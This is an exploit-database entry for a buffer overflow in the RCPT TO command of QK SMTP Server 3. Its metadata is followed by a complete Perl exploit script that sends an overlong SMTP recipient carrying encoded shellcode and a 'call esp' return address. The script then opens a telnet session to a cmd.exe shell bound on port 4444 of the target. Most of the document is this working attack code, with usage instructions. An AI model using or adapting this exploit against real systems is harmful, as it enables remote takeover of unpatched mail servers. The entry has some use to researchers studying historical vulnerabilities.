qksmtp-rcpt-overflow-4444

vendor:

by:

Jacopo Cervini

7.5

CVSS

HIGH

Buffer Overflow

119

CWE

Product Name:

Affected Version From:

Affected Version To:

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested: Windows XP Pro SP0 English, Windows XP Pro SP2 Italian, Windows 2000 SP4 Italian/English

Bind a remote cmd.exe on target host on 4444 port. This exploit is based on the original exploit discovered by Greg Linares. The shellcode used in this exploit is encoded using Skylined alpha2 tool. Credits to hdm and vlads902 for the original shellcode.

Mitigation:

Source

Exploit-DB raw data:

#!/bin/perl
#
#https://www.securityfocus.com/bid/20681
#
#	tested on winXp Pro SP0 English/winXp Pro SP2 Italian/win 2k SP4 Italian/English return address is universal
# bind a remote cmd.exe on target host on 4444 port; based on expanders original exploit
# credit to Greg Linares for discovered the vulnerability
# thanks to hdm and vlads902 for original shellcode;encoded using Skylined alpha2 tool
# Jacopo Cervini aka acaro [at] jervus.it


if (@ARGV < 1) {
print "--------------------------------------------------------------------\n";
print "Usage : qksmtp-rcpt-overflow-4444.pl TargetIPAddress \n";
print " Example : ./qksmtp-rcpt-overflow-4444.pl 127.0.0.1 \n";
print "--------------------------------------------------------------------\n";
}



use IO::Socket::INET;

my $host = shift(@ARGV);
my $port = 25;
my $reply;
my $request;
#my $eip="\x43\x43\x43\x43";	

my $eip="\x8f\x29\x46\x00";	#call esp in QKSmtpServer3.exe



$sc=
"PPYAIAIAIAIAIAIAIAIAIAIAIAIAIAIAjXAQADAZABARALAYAIAQAIAQAIAhAAAZ1AIAIAJ11AIAIABABABQI1AIQIAIQI111AIAJQYAZ".
"BABABABABkMAGB9u4JBYlQZjKNmiXkIyokOkOOptKplmTo4RkQ5oL2kCLm5PxkQJORkPOLX4KOoKpIqjKOYtKP4DKkQZNp1upryVLqtWP".
"44LGWQgZjmjaXBJKL4MkntktnHt5IURkqOnDkQzKqVRkLLNkRkQOMLM1xkm3NLTKQyBLO4mLoqy3lqIK34rkmsLptKQ0LL4KppmL4mdKM".
"pKXOnaX4N0NLNjLNpKOz6ovOcRFOxlsOBphSGRSoBaOOdkOXPRH8KjMKLOKpPkO6vQOTIXeOve1JMm8JbnuqZKRkOHPbH7izizUvMPWYo".
"6vnsOcQCb3PSMsNsOSNskOfp1VqXLQ1LrFnsu99QTUQXTdMJ2PewqGkOVvqZZpnqPUkOXPph3tTmNNZINwKO6vns0UKO6pOxIUoYBfa9r".
"7Yo6vb00TOdR5YoHP3cRHgwRYGVbYnwkOJ6OeyoJ0s60j1T36OxqSrMU9jEozPPPYNIxLQyzGrJmtriYRnQGPZSdjkNORlmynMrnL63Bm".
"PznXvKFKVKqXPrKNvSMFyoD5Mtyo6vqKPWPRPQoaNqbJkQpQpQoepQKOfpOxtmz9m58NNsiovv2JYoyoLw9oVpDK27ilqsvds4KOWfpRk".
"OvpOxhp1zitOonsKOyFKO6pA";


$jmpback = "\x50\x73".
"\x54\x73".
"\x58\x73".
"\xb0".
"\x48\x73".
"\xb0\x48\x73".
"\xb0\x48\x73".
"\xb0\x48\x73".
"\xb0\x48\x73".
"\xb0\x48\x73".
"\xb0\x48\x73".
"\xb0\x48\x73".
"\xb0\x48\x73".
"\xb0\x48\x73".
"\xb0\x48\x73".
"\xb0\x48\x73".
"\xb0\x48\x73".
"\x40\x73".
"\x40\x73".
"\x40\x73".
"\x40\x73".
"\x40\x73".
"\x40\x73".
"\x40\x73".
"\x50\x73".
"\xc3\x73";

my $buffer =("\x41"x296).$eip.("\x73"x2228).$sc.("\x45"x820).$jmpback."\x00";



my $socket = IO::Socket::INET->new(proto=>'tcp', PeerAddr=>$host, PeerPort=>$port);
$socket or die "Cannot connect to host!\n";

recv($socket, $reply, 1024, 0);
print "Response:" . $reply;


$request = "helo acaro" . "\r\n";
send $socket, $request, 0;
print "[+] Sent helo request\n";
recv($socket, $reply, 1024, 0);
print "Response:" . $reply;
sleep(1);

$request = "mail from: acaro@peaceandlove.peace" . "\r\n";
send $socket, $request, 0;
print "[+] Sent mail from request\n";
recv($socket, $reply, 1024, 0);
print "Response:" . $reply;
sleep(1);

$request = "rcpt to: " . $buffer . "\r\n";
send $socket, $request, 0;
print "[+] Sent rcpt to request\n";



print " + connect on 4444 port of $host ...\n";
sleep(3);
system("telnet $host 4444");
exit;

# milw0rm.com [2007-01-01]